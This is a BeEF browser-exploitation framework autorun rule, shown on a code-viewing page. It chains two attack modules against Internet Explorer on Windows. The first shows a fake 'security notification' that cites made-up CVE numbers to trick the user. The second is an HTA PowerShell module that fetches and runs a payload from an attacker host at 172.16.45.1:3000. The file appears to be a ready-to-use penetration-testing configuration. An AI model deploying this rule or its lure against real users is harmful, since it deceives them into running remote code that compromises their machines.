Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/arerules/ie_win_htapowershell.json
1146 views
1
{
2
"name": "HTA PowerShell",
3
"author": "antisnatchor",
4
"browser": "IE",
5
"os": "Windows",
6
"os_version": ">= 7",
7
"modules": [
8
{
9
"name": "fake_notification",
10
"condition": null,
11
"options": {
12
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
13
}
14
},
15
{
16
"name": "hta_powershell",
17
"condition": null,
18
"options": {
19
"domain":"http://172.16.45.1:3000",
20
"ps_url":"/ps"
21
}
22
}],
23
"execution_order": [0,1],
24
"execution_delay": [0,500],
25
"chain_mode": "sequential"
26
}
27
28